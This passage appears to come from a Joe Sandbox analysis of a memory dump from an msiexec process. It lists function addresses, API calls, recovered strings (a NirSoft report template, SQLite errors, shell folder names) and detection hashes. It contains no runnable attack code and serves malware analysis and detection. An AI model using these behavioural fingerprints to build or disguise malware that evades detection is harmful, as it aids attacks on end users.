                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$_snwprintf$wcscpy
                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                      • API String ID: 1283228442-2366825230
                      • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                      • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                      APIs
                      • wcschr.MSVCRT ref: 00413972
                      • wcscpy.MSVCRT ref: 00413982
                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                      • wcscpy.MSVCRT ref: 004139D1
                      • wcscat.MSVCRT ref: 004139DC
                      • memset.MSVCRT ref: 004139B8
                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                      • memset.MSVCRT ref: 00413A00
                      • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                      • wcscat.MSVCRT ref: 00413A27
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                      • String ID: \systemroot
                      • API String ID: 4173585201-1821301763
                      • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                      • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: wcscpy
                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                      • API String ID: 1284135714-318151290
                      • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                      • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                      APIs
                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                        • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                      • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                      • strchr.MSVCRT ref: 0040C140
                      • strchr.MSVCRT ref: 0040C151
                      • _strlwr.MSVCRT ref: 0040C15F
                      • memset.MSVCRT ref: 0040C17A
                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                      • String ID: 4$h
                      • API String ID: 4019544885-1856150674
                      • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                      • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                      • String ID: 0$6
                      • API String ID: 4066108131-3849865405
                      • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                      • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                      APIs
                      • memset.MSVCRT ref: 004082EF
                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                      • memset.MSVCRT ref: 00408362
                      • memset.MSVCRT ref: 00408377
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$ByteCharMultiWide
                      • String ID:
                      • API String ID: 290601579-0
                      • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                      • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                      APIs
                      • memchr.MSVCRT ref: 00444EBF
                      • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                      • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                      • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                      • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                      • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                      • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                      • memset.MSVCRT ref: 0044505E
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$memchrmemset
                      • String ID: PD$PD
                      • API String ID: 1581201632-2312785699
                      • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                      • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                      • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                      • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                      APIs
                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                      • GetDC.USER32(00000000), ref: 00409F6E
                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                      • GetParent.USER32(?), ref: 00409FA5
                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                      • String ID:
                      • API String ID: 2163313125-0
                      • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                      • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                      • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                      • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: free$wcslen
                      • String ID:
                      • API String ID: 3592753638-3916222277
                      • Opcode ID: c4f87af86e473d9e91a8a963f900e882b0641065c65ce89cd0d3202dbcb0c8fb
                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                      • Opcode Fuzzy Hash: c4f87af86e473d9e91a8a963f900e882b0641065c65ce89cd0d3202dbcb0c8fb
                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                      APIs
                      • memset.MSVCRT ref: 0040A47B
                      • _snwprintf.MSVCRT ref: 0040A4AE
                      • wcslen.MSVCRT ref: 0040A4BA
                      • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                      • wcslen.MSVCRT ref: 0040A4E0
                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpywcslen$_snwprintfmemset
                      • String ID: %s (%s)$YV@
                      • API String ID: 3979103747-598926743
                      • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                      • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                      APIs
                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                      • wcslen.MSVCRT ref: 0040A6B1
                      • wcscpy.MSVCRT ref: 0040A6C1
                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                      • wcscpy.MSVCRT ref: 0040A6DB
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                      • String ID: Unknown Error$netmsg.dll
                      • API String ID: 2767993716-572158859
                      • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                      • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                      APIs
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • wcscpy.MSVCRT ref: 0040DAFB
                      • wcscpy.MSVCRT ref: 0040DB0B
                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: PrivateProfilewcscpy$AttributesFileString
                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                      • API String ID: 3176057301-2039793938
                      • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                      • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                      APIs
                      Strings
                      • database %s is already in use, xrefs: 0042F6C5
                      • out of memory, xrefs: 0042F865
                      • too many attached databases - max %d, xrefs: 0042F64D
                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                      • database is already attached, xrefs: 0042F721
                      • unable to open database: %s, xrefs: 0042F84E
                      • cannot ATTACH database within transaction, xrefs: 0042F663
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                      • API String ID: 1297977491-2001300268
                      • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                      • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                      APIs
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                      • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                      • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                      • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                      • String ID: ($d
                      • API String ID: 1140211610-1915259565
                      • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                      • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                      APIs
                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                      • Sleep.KERNEL32(00000001), ref: 004178E9
                      • GetLastError.KERNEL32 ref: 004178FB
                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: File$ErrorLastLockSleepUnlock
                      • String ID:
                      • API String ID: 3015003838-0
                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                      APIs
                      • memset.MSVCRT ref: 00407E44
                      • memset.MSVCRT ref: 00407E5B
                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                      • wcscpy.MSVCRT ref: 00407F10
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                      • String ID:
                      • API String ID: 59245283-0
                      • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                      • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                      APIs
                      • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                      • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                      • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                      • API String ID: 3510742995-3273207271
                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                      APIs
                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                      • memset.MSVCRT ref: 00413ADC
                      • memset.MSVCRT ref: 00413AEC
                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                      • memset.MSVCRT ref: 00413BD7
                      • wcscpy.MSVCRT ref: 00413BF8
                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                      • String ID: 3A
                      • API String ID: 3300951397-293699754
                      • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                      • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • wcscpy.MSVCRT ref: 0040D1B5
                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                      • wcslen.MSVCRT ref: 0040D1D3
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                      • String ID: strings
                      • API String ID: 3166385802-3030018805
                      • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                      • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                      APIs
                      • memset.MSVCRT ref: 0041249C
                      • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                      • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                      • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                      • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                      • wcscpy.MSVCRT ref: 004125A0
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                      • String ID: r!A
                      • API String ID: 2791114272-628097481
                      • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                      • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                      • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                      • String ID: BIN
                      • API String ID: 1668488027-1015027815
                      • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                      • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                      APIs
                      • memset.MSVCRT ref: 00411AF6
